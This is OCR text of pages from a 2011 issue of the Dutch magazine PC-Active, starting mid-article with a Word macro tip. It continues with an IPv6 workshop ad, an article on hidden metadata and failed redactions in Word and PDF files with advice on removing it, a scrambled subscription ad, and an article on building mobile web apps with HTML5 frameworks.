ster dat verschijnt, geeft u een naam op, bijvoorbeeld ‘verschuifwoord’. Onder beschrijving kunt u verder nog een tekst intikken waarin de werking nader wordt verklaard. Als u de macro ook in andere documenten wilt kunnen gebruiken, slaat u de macro op in het bestand Alle documenten (normal.dotm); dat is ook de defaultstand. Omdat we de macro met een toetscombinatie willen oproepen, klikken we vervolgens op de knop Toetsenbord. In het tweede venster Toetsenbord aanpassen kiest u nu een combinatie van de Ctrl-toets met een letter of teken, bijvoorbeeld Ctrl + / en drukt u op de knop Toewijzen. De toetscombinaties die al eerder zijn gebruikt, staan te lezen in het vakje links op het scherm. Houd er bij het toewijzen van een combinatie ook rekening mee dat een al bestaande functie die aan de combinatie is gekoppeld wordt overschreven. Kiest u bijvoorbeeld de combinatie Ctrl + Z, dan is deze standaardcombinatie niet meer te gebruiken om een actie ongedaan te maken. Er verschijnt nu een klein icon in beeld dat een cassette voorstelt ten teken dat de opname is begonnen. Elke toetsactie wordt nu geregistreerd, dus fouten kunt u zich hierbij eigenlijk niet veroorloven zonder
overbodige instructies in de te macro stoppen. Voer nu de volgende reeks toetscombinaties in: 1) Ctrl + pijl links – om naar het begin van het woord te gaan 2) Ctrl + Shift + pijl rechts – om het hele woord te selecteren (een dubbelklik om een heel woord te selecteren werkt niet bij een opname) 3) Ctrl + X – om het woord te knippen 4) Ctrl + pijl rechts – om naar het volgende woord te gaan 5) Ctrl + V – om het geselecteerde woord te plakken 6) Sluit nu de macro via menu Macro’s | Opname stoppen Vanaf nu staat de macro ter beschikking en kunt u elk woord met Ctrl + / een positie opschuiven. In feite bent u bij het opnemen van een macro via Visual Basic aan het programmeren. De code die u hebt geschreven, kunt u teruglezen onder Beeld | Macro’s | Macro’s weergeven, waarna u in het venster Macro’s de macro ‘verschuifwoord’ selecteert en op de knop Bewerken klikt. In het venster kunt u de code wijzigen of verder schrijven, maar enige kennis van Visual Basic is daar wel bij nodig.
Macro’s opnemen voor een toetscombinatie
56
PC-ACTIVE | Nr. 245 – 2011
404 word-tips.indd 56
11-02-2011 09:35:31
PC-ACTIVE WORKSHOP
7 april 2011
EXCLUSIEVE WORKSHOP OVER IPV6 Door specialist Henk van de Kamer
Nu de wereldwijde voorraad aan ipv4-adressen is uitgeput, komen er steeds meer vragen over diens opvolger ipv6. In de workshop laten we zien wat er allemaal verandert, hoe u alvast aan de slag kunt gaan als uw huidige provider nog niets kan leveren en wat er verder allemaal bij de invoering komt kijken. In het tweede deel gaan we in op de vragen die deelnemers tijdens hun aanmelding voor de workshop kunnen stellen. Kortom, een uitgekiende gelegenheid om u goed te informeren over ipv6. De workshop is bedoeld voor systeembeheerders of als uw bedrijf geen eigen systeembeheerder heeft en u zich toch zorgen maakt over wat er allemaal staat te gebeuren. Over Henk van de Kamer Na zijn studie trad Henk als cd-romcoördinator in dienst bij de uitgeverij van PC-Active. In de afgelopen 16 jaar was hij onder andere systeembeheerder en op basis van die ervaringen zijn de nodige artikelen verschenen. In 2007 is hij begonnen met het uitzoeken wat de gevolgen van de invoering van ipv6 voor met name de thuis- en kleinzakelijke gebruikers betekent en heeft hij zich ontwikkeld tot expert op het gebied van ipv6. Inschrijven Deze workshop vindt plaats in Haarlem op donderdag 7 april 2011. Er zijn slechts vijfentwintig plaatsen beschikbaar. Wilt u verzekerd zijn van een plek? Schrijf u dan snel in! Inschrijven kan via www.pc-active.nl/workshops Vroegboekkorting PC-Active-lezers die zich vóór 15 maart inschrijven, ontvangen een vroegboekkorting van maar liefst € 30,–. U betaalt dan slechts € 119,– in plaats van € 149,–. PROGRAMMA
15:30u – 15:45u Koffiepauze
13:00u – 13:30u Ontvangst met koffie, thee en broodjes; voorstelronde en uitleg van het programma
MELD U NU AAN VIA WWW.PC-ACTIVE.NL/WORKSHOPS 11-02 PCA workshop.indd 1
11-02-2011 12:13:52
VERBORGEN INFORMATIE IN TEKSTDOCUMENTEN
SCHATGRAVEN IN METADATA TEKST : KOEN VERVLOESEM
Zonder dat u het weet, geeft u heel wat gevoelige informatie prijs als u een Word- of pdf-document verspreidt. Zowat alle bestandstypes bevatten immers naast de zichtbare informatie ook zogenaamde metadata, waarvan u het bestaan niet altijd beseft. Hoe kunt u interessante metadata vinden en (wat misschien nog belangrijker is) hoe voorkomt u dat u zelf dit soort fouten maakt?
I
n PC-Active 243 hadden we het over metadata in afbeeldingen of foto’s, die u bijvoorbeeld via Flickr of Twitter de wijde wereld instuurt. Hiermee kunt u per ongeluk uw gps-coördinaten of een onbewerkte versie van de foto prijsgeven. Dit probleem is echter niet uniek voor foto’s, maar komt ook voor bij tekstdocumenten. Zo verspreidde de groep Anonymous eind vorig jaar een persbericht (in pdf-formaat) over Operation Payback, de DDoS-actie om de tegenstand tegen Wikileaks te wreken. Helaas was het pdf-bestand niet zo anoniem als de groep zou willen... In de documenteigenschappen stond als auteur Alex Tapanaris en pdf-expert Didier Stevens ontdekte dat de tijdzone +02 was. Zowel de tijdzone als de naam zijn Grieks. Andere interessante informatie is dat het bestand met Openoffice.org 3.2 aangemaakt is. Uiteraard ontstond er discussie over het feit dat de maker de informatie nu vergeten was te verwijderen of dat hij er speciaal een verzonnen naam in gezet had om iedereen op een dwaalspoor te brengen, maar de eerste hypothese is wel waarschijnlijker, aangezien de ddos-acties van deze scriptkiddy’s ook niet veel intelligentie vertoonden: de meesten die de aanvalssoftware LOIC draaiden, deden dit gewoon vanaf hun thuis-pc en verraadden daarmee hun ip-adres... Moderne pdf-bestanden bevatten ook zogenaamde xmp-metadata. Xmp (extensible metadata platform) is een xml-standaard om metadata in een bestand te stoppen, en Adobe gebruikt dit onder andere in pdf’s. Deze metadata bevatten bijvoorbeeld de oorspronkelijke bestandsnaam, met welk programma
58
het pdf-bestand werd aangemaakt en wanneer, enzovoorts. Op een bepaald moment in 2008 besloot eBay Australië om enkel zijn eigen betaalsysteem PayPal toe te laten, en daarop kwamen heel wat reacties bij de Australische Competition Commission and Consumer Commission (ACCC), die de reacties op zijn website publiceerde. Eén van de reacties bleek een lijvig document te zijn met uitgebreid gestoffeerde argumenten tegen eBays beslissing, en de ACCC had besloten de naam van de klager uit het document te verwijderen. De ACCC was echter vergeten om de XMP-metadata te filteren, waarin als originele bestandsnaam ‘Microsoft Word - 204481916_1_ACCC Submission by Google re eBay Public _2_.DOC’ stond, waarmee de klager geïdentificeerd kon worden... MS Word-documenten zijn ook notoir bekend voor hun datalekken: in de metadata staat informatie over de originele auteur, het bedrijf of organisatie, de naam van uw computer, de naam van de netwerkserver of harde schijf waar het document opgeslagen is, de bestandsnaam, locatie (wat informatie over geheime projecten kan prijsgeven) en auteur van de tien laatste versies van het document, enzovoorts. Zo werd enkele jaren geleden bekend dat de anonimiteit van peer reviewers van academische artikels vaak een lachertje is. Als zij hun rapport immers in een Word-bestand stoppen en geen extra maatregelen nemen, zit hun naam in de metadata van het Word-bestand, en kan de schrijver van het artikel de reviewer identificeren, wat natuurlijk niet de bedoeling is. De meeste academici staan hier helemaal niet bij stil.
PC-ACTIVE | Nr. 245 – 2010
509 metadata.indd 58
10-02-2011 15:16:56
METADATA
| SOFTWARE
Pdf redigeren
Bescherm uzelf
Vaak ligt het probleem bij de gebruikers, die een naïef idee hebben van de werking van een bestandsformaat, dit dan verkeerd gebruiken en daardoor denken dat ze de informatie verwijderd hebben terwijl ze die eigenlijk slechts onder de oppervlakte verborgen hebben, klaar om opgegraven te worden. Zo probeerde Facebook in 2009 de details van een akkoord met ConnectU te verbergen door journalisten uit de rechtszaal te laten verbannen en delen van de gerechtelijke documenten (in pdf-formaat) te laten redigeren. Helaas voor Facebook gebeurde dat laatste op zo’n amateuristische manier dat het gewoon lachwekkend is: bepaalde tekst is onzichtbaar gemaakt en overschreven door de tekst [REDACTED], maar als u de onzichtbare tekst kopieerde en in een ander bestand plakte (bijvoorbeeld in Kladblok), verscheen ze gewoon in dat andere bestand! En de Amerikaanse Transportation Security Administration (TSA) trapte in dezelfde val toen het een intern document met richtlijnen voor het screenen van passagiers op zijn website publiceerde, bedekte het gevoelige informatie met zwarte blokjes. Het bestand bevatte echter nog altijd de verborgen tekst. De boodschap is duidelijk: informatie onzichtbaar maken door er tekst of zwarte blokken overheen te plaatsen of de achtergrondkleur gelijk te maken aan de voorgrondkleur is niet hetzelfde als informatie verwijderen! De informatie zit dan nog altijd in het bestand. Sinds versie 8.0 heeft Adobe Acrobat Professional overigens een redactiefunctie (in het menu View | Toolbars | Redaction) die de informatie wel degelijk verwijdert, dus gevoelige tekst redigeren is echt niet zo moeilijk, u moet enkel de juiste tool gebruiken. Blijkbaar is dit echter nog niet bij iedereen doorgedrongen, want met de regelmaat van de klok duiken er weer zaken op waarbij rechters of mensen uit de beveiligingsbranche deze elementaire fout maken.
Hoe beschermt u zichzelf tegen het gevaar dat u metadata lekt in tekstdocumenten? In het algemeen bevatten pdf-documenten minder metadata dan Word-documenten, dus uw Word-bestand naar pdf omzetten, is meestal al een goed begin. Dat is sowieso een goed idee, want Word-documenten zijn bedoeld om teksten aan te passen en pdf-documenten om teksten te publiceren. Controleer altijd ook voor u een document publiceert of de documenteigenschappen niets verraden dat u niet wilt. De metadata in een Word-bestand verwijderen kan niet in één-twee-drie, omdat er zoveel verschillende soorten metadata zijn. In de opties van Office in het Tools-menu kunt u de gebruikersinformatie instellen die in uw documenten geplaatst wordt, waaronder uw naam, initialen en adres. Vul hier onzingegevens in of een spatie om dit leeg te houden. Let echter op: deze gegevens worden nu enkel in nieuwe documenten geplaatst; bestaande documenten behouden nog de vorige gegevens. Elk Word-document heeft ook metadata die specifiek voor het bestand ingesteld kunnen worden, wat te vinden is in het File-menu onder Properties. Deze informatie wordt ook getoond als u in Windows Explorer rechtsklikt op het bestand en op Properties klikt. Om dit te verwijderen, opent u het menu File | Properties in Word en maakt u de tekstboxen met de informatie dit u niet wilt verspreiden leeg. Bevestig de wijzigingen dan met OK en sla het bestand op. Als u met verschillende personen aan één document werkt, moet u zeker extra controleren of er geen sporen van deze samenwerking meer in het bestand zitten. Daarbij denken we bijvoorbeeld aan de namen van mensen die commentaar geven. U verwijdert deze commentaren vóór publicatie door erop te rechtsklikken. Revisies (‘track changes’) zijn een ander hulpmiddel waarop u moet letten, aangezien deze de wijzigingen
Wie is Anonymous? Alex Tapanaris is er in ieder geval deel van
PC-ACTIVE | Nr. 245 – 2010
509 metadata.indd 59
59
10-02-2011 15:17:29
SOFTWARE
| METADATA
Zo verbergt u geen geheimen in een pdf-bestand
aan de tekst én degene die dit gewijzigd heeft, tonen. Accepteer of verwerp alle revisies, zodat de gereviseerde respectievelijk originele tekst naar het bestand wordt geschreven en de revisie-aanduiding geen onderdeel meer is van het bestand. Word slaat zoals gezegd ook de namen van de laatste tien auteurs en de locatie van het bestand op hun harde schijf op in een Word-bestand. De eenvoudigste manier om deze informatie te verwijderen zonder speciale tools is het Word-document opslaan in een ander formaat dat deze metadata niet bevat, zoals rtf of html. Daarna kunt u dit bestand opnieuw omzetten naar het Word-formaat en dit verspreiden. Word laat ook toe om meerdere versies van een document in één bestand op te slaan. Als u deze functie gebruikt, open dan het menu File | Versions en verwijder alle oudere versies, waarna u het bestand opnieuw opslaat. Schakel zeker ook de optie Allow fast saves uit in het tabblad Save van het menu Tools | Options. Deze optie versnelt immers wel het opslaan van bestanden, maar dit doet het door enkel de wijzigingen achteraan het bestand te plakken, waardoor de originele tekst nog in het bestand aanwezig is, ook al wordt dit niet door Word getoond. Door speciale tools kan die tekst dan nog geëxtraheerd worden. En vergeet tot slot niet als u andere bestanden in een Word-document of PowerPoint-presentatie inbedt, dat deze bestanden ook metadata kunnen bevatten. We hoeven maar te wijzen op het artikel van vorige maand over exif-metadata in jpg-afbeeldingen. Word kent ook een optie Remove personal information from this file on savein het tabblad Security van het menu Tools | Options, dat ondermeer de bestandseigenschappen en namen van revisies en versies anonimiseert, maar deze optie werkt enkel in het bestand dat u aan het bewerken bent, dus u moet dit elke keer opnieuw doen. De meeste metadata die we hier voor Word vermeld hebben, bestaat natuurlijk ook voor andere Microsoft Office-formaten. Voor details over meta-
60
data in verschillende versies van verschillende Officeprogramma’s verwijzen we u naar het knowledge base artikel van Microsoft in het kader Links onderaan dit artikel. Consulteer dit artikel zeker ook als u geavanceerdere functies van Office gebruikt, waarmee u misschien ook nog informatie kunt lekken. Gelukkig heeft Microsoft ook een aantal tools die u helpen met het verwijderen van metadata voor publicatie. Voor Office 2003/XP is er de add-on Remove Hidden Data en voor Office 2007 is er de Document Inspector-functie. Ook Adobe heeft niet stilgezeten: Acrobat heeft een functie Examine Document in de documenteigenschappen, waarmee u kunt aanvinken welke informatie u uit een pdf-document wilt verwijderen. Maak gebruik van deze tools, zodat u geen domme fouten maakt en uw privacy te grabbel gooit!
INFORMATIE De niet zo anonieme groep Anonymous paulrankin.tumblr.com/post/2166282743/ anonymous-has-supposedly-released-a-press-release Pdf-bestanden redigeren blogs.adobe.com/security/2009/12/ how_to_properly_redact_pdf_fil.html Verborgen informatie in pdf-bestanden blogs.adobe.com/security/2010/04/ are_you_redacting_pdf_document.html How to minimize metadata in Office documents support.microsoft.com/kb/223396/ Office 2003/XP Add-in: Remove Hidden Data https://www.microsoft.com/downloads/en/details. aspx?FamilyId=144E54ED-D43E-42CA-BC7B5446D34E5360 Document Inspector https://office.microsoft.com/en-us/help/ inspect-documents-for-hidden-data-and-personal-information-HA010074435.aspx
PC-ACTIVE | Nr. 245 – 2010
509 metadata.indd 60
10-02-2011 15:17:54
U
NU WORD EE! ABONN
N WORD
! ONNEE
EE! ABONN
RD NU O W ! NU ONNEE WORD B A ! EE ABONN
EE!
ABONN
WORD NU ABONNEE! WORD
NU
WORD
NU
NU WORD U N NNEE! O WORD B A EE! ABONN
EE!
ABONN
RD NU ABONNEE! O NU W WORD ! NU E E D R N U O N N ABO ORD NNEE! U W O W ! N B E A E D R N U ! N N WO ONNEE WORD ! ABO B E A E N U ! N N E RD NE U ABO ORD N U WO NEE! ABON W N D R U ! O N N ONNEE WORD NU W NNEE! ABO B A D R U ! O N E W E BO WORD ABONN EE! A N U ! N N E O E D B A OR NN NU W NNEE! ABO D R U O ABO ORD N U W W ! N E E D R N U ! N N WO ONNEE WORD ! ABO B E A E N U ! N N E E ABO WORD RD NU ABONN O U W ! N E E D ! OR NN NU ONNEE WORD NU W NNEE! ABO B A D R U ! O N E O W WORD BONNE E! AB A E N U ! N N E O E D R N U AB ORD N U WO NEE! ABON W N D R U O N N WORD NU W NNEE! ABO O WORD AB
B
EE!
ABONN
1 JAAR
NU WORD EE! ABONN
(26X)
WORD U N ON WORD E! AB E N N O AB WOR U N D WOR EE! ABONN
VOOR MAAR
39,50
ABONN
NU WORD E! BONNE A ! E E ABONN
c Haal meer uit uw p ! met Computer Idee eken ● Verschijnt elke 2 w n ● Tips & achtergronde software ● Tests van hard- en ● Koopadviezen ps ● Duidelijke worksho
NU WORD EE! ABONN
NNEE!
EE
ABONN
ABO NNEE! NU O D B R A O U ORD N RD N NEE! U W W ! O N N E O W E D B R N U A O N N U WORD ORD N NNEE! NU W NNEE! ABO BONNE O A D B R U A ! O N E O W bijna E! RD NE AB BONNE RD NU ABONNEE! U WO NEE! ABON O N W D R O N N U WORD ORD N NNEE! NU W NNEE! ABO O W D B R U A O N U W N BO E! WORD ABONN WORD EE! A D NU BONNE R N U A ! O N N E O W E D ! B E R N A E RD NU ABONNEE! U WO NEE! ABON ABONN O N W D R O N ! NU WORD NU W NNEE! ABO ONNEE WORD D B R U A O N U O W D ! N B R A EE WORD RD NU ABONNEE! U WO NEE! ABON ABONN O N W D ! E R E O ABON RD NU ABONNEE! U W ABONN ! O N E W E D R N RD NU ABONNEE! U WO NEE! ABON WOR O N W D R U O N N U O W D ! N B E R A E O U WORD ABONN ORD N NNEE! NU W NNEE! ABO O W D ! B E R A E O N U RD N NEE! U W ABON ! ABO O N N E O W E D B R N A O N W NU ABO WORD
40% korting op de winkelprijs!
Surf naar www.computeridee.nl/abonneren EW_CID 09-10 210x297.indd 4
WORD
1/25/10 1:54:10 PM
NU
APPS OOK MAKKELIJK ZELF TE MAKEN
APPS VEROVEREN DE MOBIELE WERELD TEKST : DIRK JAN VAN IT TERSUM
Met komst van Android, Windows Phone 7 en het BlackBerry OS is er de nodige concurrentie voor de iPhone ontstaan. Het zijn alle stuk voor stuk interessante besturingssystemen om apps voor te ontwikkelen, maar het versnipperde beeld zorgt wel voor hoofdbrekens bij ontwikkelaars.
H
oewel Apple de app op de kaart heeft gezet, is losse software voor de mobiel niet nieuw. Al jarenlang bestaan er Javaapplicaties die geschikt zijn verschillende mobiele telefoons. En ook voor mobiele besturingssystemen als Palm OS en Windows Mobile is sinds jaar en dag software verkrijgbaar. Toch was die software lang niet zo succesvol als de apps voor de iPhone. Apple heeft het installeren van apps zo gemakkelijk gemaakt dat het bijna verslavend is. De apps van Apple werden pas een succes toen het bedrijf native apps introduceerde. Op de eerste generatie iPhones konden dergelijke apps nog niet worden geïnstalleerd. Er bestonden toen alleen nog web apps, die alleen in de browser draaien. Het succes daarvan was beperkt. Inmiddels zijn we een paar jaar verder en is de wereld gewend geraakt aan native apps, maar zo langzamerhand lopen ontwikkelaars ook tegen de nadelen ervan aan. Dat komt vooral doordat het aantal mobiele besturingssystemen fors toeneemt en een native app slechts geschikt is voor één besturingssysteem. Een app ook geschikt maken voor Android brengt een hoop werk met zich mee. Op een rijtje de belangrijkste mobiele OS’en van het moment: Android, iOS (iPhone), Symbian, BlackBerry, Bada, Windows Phone 7 en WebOS. Het ontwikkelen van apps voor verschillende platformen kost geld en tijd. Er zijn wel tools die beweren dat het mogelijk is om een app in een keer voor meer OS’en te ontwikkelen, maar volgens veel ontwikkelaars valt dat in de praktijk nogal tegen. Op zoek naar een oplossing voor dit probleem komen we terug bij de ‘goede oude’ web app. Zulke apps draaien in de browser, onafhankelijk van het
62
platform. Het maakt dus niet uit of de gebruiker een iPhone, een Android- of Windows Phone 7-telefoon heeft, de web app werkt (in theorie) altijd. Hoewel de app in de browser draait, kan het in veel gevallen wel gebruikmaken van de hardware van de telefoon. Zo is het mogelijk dat de web app toegang krijgt tot de gegevens van de gps-ontvanger. Een goed voorbeeld van zo’n web app is Eurocampings.net. Wanneer u met de browser van uw mobiele telefoon naar deze site toegaat, komt u er automatisch op terecht. In feite is het een website die is aangepast voor de mobiele telefoon, maar met een opvallend extraatje. De mobiele site kan de gegevens van de gps-ontvanger gebruiken om campings in de buurt aan te raden. Deze gps-functie werk op de iPhone en Android-toestellen.
Nadelen Klinkt dus mooi, zo’n web app. Waarom gebruiken we dan niet massaal web apps? Er zijn nadelen. En die kunnen zelfs zo zwaar wegen, dat het toch de moeite waard is om native apps te ontwikkelen. Twee nadelen van web apps: 1) Niet in de app stores Misschien wel het grootste bezwaar is dat web apps niet in de app stores mogen staan. Vooral Apple hanteert strikte regels. Veel gebruikers zoeken naar apps via de app store en komen de web apps dus niet tegen. Om zo’n web app te vinden, dient u zelf met uw browser naar de juiste url toe te gaan. Vervolgens kunt u een soort snelkoppeling op het beginscherm maken, zodat de web app een volgende keer snel is gevonden. Op zich een goede oplossing, maar de vraag is hoeveel mensen in de praktijk al deze handelingen willen uitvoeren?
PC-ACTIVE | Nr. 245 – 2011
409 webapps.indd 62
11-02-2011 11:24:15
APPS
2) Gebruikerservaring Native apps zijn in het voordeel bij de snelheid en gebruikerservaring. De belangrijkste bedieningselementen en afbeeldingen staan al op het scherm. Bij een web app moeten ze eerst worden gedownload. Ook kan een web app niet altijd alle hardware gebruiken. Denk daarbij aan de ingebouwde camera, het adresboek of het kompas. Native apps hebben wel eenvoudig toegang tot deze zaken. Een native app biedt ontwikkelaars bovendien meer mogelijkheden om de user interface volledig naar eigen wens vorm te geven. Bij een web app zit de ontwikkelaar altijd vast aan de beperkingen van de door de browser ondersteunde technologieën. Ondanks de nadelen komen er de laatste tijd steeds meer berichten naar buiten over ontwikkelaars die toch kiezen voor web apps. Zo liet de NOS weten geen losse applicaties meer te maken. Het ontwikkelen en het bijwerken van apps voor de verschillende platformen werd hun te duur. De omroep ageerde bovendien tegen het beleid van Apple om web apps niet toe te staan in de App Store (overigens houdt Apple op de website www.apple.com/webapps wel een overzicht bij van web apps). Ook het gratis dagblad De Pers heeft er welbewust voor gekozen geen native app te ontwikkelen. Wie met zijn mobiele telefoon of tablet naar de site i-pers.nl surft, komt terecht op een speciaal voor deze apparaten ontwikkelde web app. Deze web app is volledig gemaakt in html5.
Heilige graal En daarmee komen we meteen terecht op de heilige graal voor web app ontwikkelaars: html5. Dankzij deze nieuwe versie van html is het mogelijk om web apps te maken die zich gedragen als ware het heuse native apps. Er is zelfs een mogelijkheid voor offline-gebruik. De web app wordt eenmalig door de gebruiker gedownload. Daarna kan hij de app telkens gebruiken in zijn browser. Doordat de web app op de telefoon zelf staat, start het ook snel op. Html5 is nog volop in ontwikkeling. Sommige mobiele browsers ondersteunen het al, maar het staat allemaal nog wel in de kinderschoenen. Het aanbod web apps is daardoor ook nog relatief beperkt. De meeste apps zijn ook nog vrij eenvoudig, maar niets staat een ontwikkelaar in de weg om ook gecompliceerde apps als web app uit te brengen. Web apps hebben al beperkt toegang tot de hardware van de telefoon. Waar nu de gps-ontvanger kan worden gebruikt, zal straks ook het adresboek en het kompas geraadpleegd kunnen worden. Android is er al klaar voor: begin dit jaar kondigde Google aan dat web apps toegang zullen krijgen tot alle belangrijke hardware. De verwachting is dat deze mogelijkheid een standaard onderdeel gaat worden van Webkit, de software die zowel door Apple als door Google wordt gebruikt voor weergave van webpagina’s.
| SOFTWARE
Een voorbeeld van een web app is Eurocampings. net, deze app gebruikt de gpsontvanger
Strijd Toch gaan de ontwikkelingen niet helemaal van een leien dakje. Er dreigt namelijk een strijd tussen het W3C aan de ene kant en Apple en Google aan de andere kant. W3C, de organisatie die gaat over de html-standaarden, ontwikkelt standaarden om web apps te ontwikkelen. Het gaat hier om zogeheten W3C-widgets: kleine web apps die de gebruiker op zijn telefoon kan installeren. W3C-widgets zijn nog niet overgenomen door Apple en Google in hun browsers. Concurrerende mobiele browsers, zoals die van Opera, hebben de standaard al wel overgenomen. De W3C-standaard is trouwens nog volop in ontwikkeling. Dankzij W3C-widgets kunnen bijzonder geavanceerde web apps worden ontwikkeld door gebruik te maken van html5, css3 en Javascript. Het grote voordeel van deze web apps is evident: ze draaien op iedere mobiele browser die overweg kan met W3C-widgets, ongeacht het mobiele besturingssysteem. Deze strubbelingen weerhoudt ontwikkelaars er niet van ook nu al geavanceerde web apps te maken. Ter inspiratie is het goed om eens naar de OpenAppMkt te gaan. Deze website verzamelt web apps en heeft bovendien zelf een geavanceerde web app uitgebracht waarmee u web apps kunt zoeken en ‘installeren’ op de iPhone. Het blijkt zelfs mogelijk om volledige games als web app te maken. Een voorbeeld is de app Pie Guy, een soort PacMan-achtig spelletje, dat zich laat bedienen door met uw vinger over het scherm te vegen. Een andere geavanceerde web app in OpenAppMkt is Harmonious, een tekenprogrammaatje waarmee een beetje artiest aardige tekeningen mee kan maken. Er is ook een native-versie van beschikbaar in de app-winkel, maar deze web app bewijst dat het ook prima mogelijk is geavanceerde applicaties in
PC-ACTIVE | Nr. 245 – 2011
409 webapps.indd 63
63
11-02-2011 11:24:53
SOFTWARE
| APPS
web-appvorm te gieten. Handig is verder de web app om Google Voice te gebruiken.
Frameworks Diverse hulpmiddelen (frameworks) helpen bij het ontwikkelen van apps. De meeste van de hier genoemde frameworks zijn bedoeld om web apps te ontwikkelen voor de iPhone, maar enkele bieden ook hulp bij het ontwikkelen voor andere platformen.
iUI Een framework met een Javascript-bibliotheek, css en afbeeldingen om geavanceerde iPhone-apps te ontwikkelen. code.google.com/p/iui/
iWebkit Een handig hulpmiddel om een iPhone- of iPad-website of -web app te maken. Het bevat standaard code om snel een site te ontwikkelen die correct wordt weergegeven op de iPhone en iPad. Het gebruikt zo min mogelijk Javascript, waardoor het gebruik ervan makkelijk is. iwebkit.net/
JQPad Dit is een framework speciaal bedoeld voor de iPad. U kunt er op vrij makkelijke wijze iPad-web apps mee ontwikkelen. Het gebruikt jQuery en CSS. code.google.com/p/jqpad/
JQuery Mobile Met dit framework kunt u web apps ontwikkelen die werken op mobiele touch-apparaten. Het ondersteunt veel platformen, waaronder iOS, Android, BlackBerry, Bada en Windows Phone. jquerymobile.com/
PhoneGap Dit is een open-sourceframework om mobiele applicaties te bouwen. De apps kunnen gebruikmaken van de hardware van onder meer iPhone en Android-toestellen, zo belooft de documentatie. Met PhoneGap kunt u native apps bouwen, terwijl het ontwikkelwerk in html en Javascript gebeurt. www.phonegap.com/
Sencha Touch Een framework om html5-web apps te bouwen. Het gebruikt html5 in combinatie met css3 en Javascript, waarmee het zelfs mogelijk is om offline data op te slaan. Sencha Touch werkt voor iOS en Android.
Een belangrijk pluspunt voor ontwikkelaars is dat OpenAppMkt de mogelijkheid biedt om geld te vragen voor web apps. Een app die via OpenAppMkt is ‘geinstalleerd’ zoekt altijd even contact met deze dienst om te controleren of u de app wel mag gebruiken. Een voorbeeld van een betaalde app is Swiss Watch, die € 0,99 kost. Op zich is de app is niet echt een aanrader: het is slechts een afbeelding van een Zwitsers horloge dat de tijd toont. Het bewijst in ieder geval dat het mogelijk is om betaalde apps te verspreiden via deze web-appwinkel. Betalen gaat via creditcard. Als u eerder al eens iets hebt gekocht, hoeft u slechts in te loggen met uw e-mailadres en wachtwoord. De eerder ingevoerde creditcard wordt dan gebruikt voor de aankoop. Ontwikkelaars ontvangen 80 procent van de opbrengst. Apple en Android geven 70 procent van de opbrengst aan ontwikkelaars.
Aan de slag Een web app voor de iPhone ontwikkelen verschilt in feite niet zo heel veel van een ‘gewone’ html-website. We laten dat zien aan de hand van het in het kader genoemde iWebKit-framework. Bij het framework iWebKit wordt een goede handleiding geleverd. Daarin staat onder meer welke bestanden u op de server moet zetten zodat de web app met iWebKit werkt. Hiervoor met er een map aangemaakt worden met de iWebKit-bestanden. Daarna kunt u een eenvoudige html-pagina aanmaken: <meta content="yes" name="apple-mobileweb-app-capable" /> <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <script src="javascript/functions.js" type="text/javascript">
www.sencha.com/products/touch/
Sproutcore Touch Het doel van Sproutcore is een html5-applicatieframework te ontwikkelen waarmee apps gemaakt kunnen worden die werken in iedere moderne webbrowser zonder plug-ins. www.sproutcore.com
WebApp.net Een Javascript-framework dat gebruikmaakt van Ajax om web apps te bouwen voor iOS, Android, WebOS en andere systemen met een Webkitgebaseerde browser. webapp-net.com/
XUI Dit is een eenvoudig Javascript-framework om mobiele webapplicaties te bouwen. Het belooft snelle laadtijden omdat er geen ondersteuning is voor verouderde en niet-mobiele browsers. Daardoor kon de code klein blijven. xuijs.com/
64
Via de OpenAppMkt koopt u een Zwitsers horloge als web app voor € 0,99
PC-ACTIVE | Nr. 245 – 2011
409 webapps.indd 64
11-02-2011 11:25:19
APPS
<meta content="minimum-scale=1.0, width=device-width, maximumscale=0.6667, user-scalable=no" name="viewport" /> Demonstratie App ... In deze code valt een aantal zaken op. Allereerst de metatag apple-mobile-web-app-capable. Dankzij deze tag weet de mobiele versie van Safari dat het om een web app gaat. Vervolgens is er de verwijzing naar de appletouch-icon. Dit is het icoon dat in het startscherm van de iPhone kan worden geplaatst. Dit moet een icoon zijn van 114×114 pixels voor de iPhone 4 en 57×57 pixels voor oudere iPhones. Het icoon mag gewoon een vierkant zijn met een afbeelding erin. De iPhone zorgt er zelf voor dat de hoeken worden afgerond en er een typische Apple-schaduw overheen valt. Het volgende dat opvalt is apple-touch-startup-image. Net als bij een native app is het mogelijk dat een web app opstart met een splash screen. Die wordt getoond terwijl de browser op de achtergrond de web app laadt. In het voorbeeld hierboven is deze afbeelding startup.png. Na is het tijd voor de -code. Veel apps hebben bovenin een balk. In onze voorbeeldapplicatie is dit de balk met de naam Demonstratie App erin. Om dit te bereiken is de volgende code voldoende.
Demonstratie App
Vervolgens staan in onze eenvoudige webapp de menu-items, in typische Apple-stijl. De code hiervoor luidt:
Een tekenprogramma als web app. Met deze iPhone web app kan een artiest heel aardige tekeningen maken
Het resultaat van onze (aanzet tot een) web app
U ziet het: ook hier ziet de code er voor kenners van html bekend uit. Door de tags
en
te gebruiken, wordt er een opsomming gemaakt van verschillende menu-items. Dankzij het iWebKit-framework wordt dit weergegeven in de stijl van een iPhone-app. De ruimte ontbreekt om hier dieper in te gaan op het ontwikkelen van een web app. De site www.iwebkit. net bevat veel informatie. Ook op de site van Apple zelf is veel informatie te vinden: developer.apple.com/ devcenter/ios.
Tot slot Het ontwikkelen van een web app blijkt in eerste instantie niet al te moeilijk, maar toch zijn er nog vrij weinig ontwikkelaars die zich erop storten. Dat is begrijpelijk. De meeste consumenten weten niet beter dan dat apps te vinden zijn in de app stores waar vooralsnog alleen native apps te krijgen zijn. Toch zijn er grote voordelen verbonden aan web apps. Belangrijkste is wel dat ze platformonafhankelijk (kunnen) werken. Het zou daarom een mooie stap zijn als de app stores van bijvoorbeeld Apple en Android besluiten om voortaan ook deze web apps op te nemen.
PC-ACTIVE | Nr. 245 – 2011
409 webapps.indd 65
65
11-02-2011 11:25:37
EXCLUSIEF VOOR PC-ACTIVE-LEZERS:
VOLLEDIGE VERSIE: SMARTKITE SNIPCLIK 3 T.W.V. € 29 Deze maand exclusief voor PC-Active-lezers een gratis en volledige versie van SnipClik 3, ter waarde van € 29. Met SnipClik kunt u foto’s snel voorzien van geotags, het formaat wijzigen, watermerken toevoegen en eenvoudige bewerkingen uitvoeren. Verder: de nieuwste versie van OpenOffice.org 3.3.0, Paint.NET en gratis register-tools voor Windows. Kijk voor de volledige inhoudsopgave op de schijf.
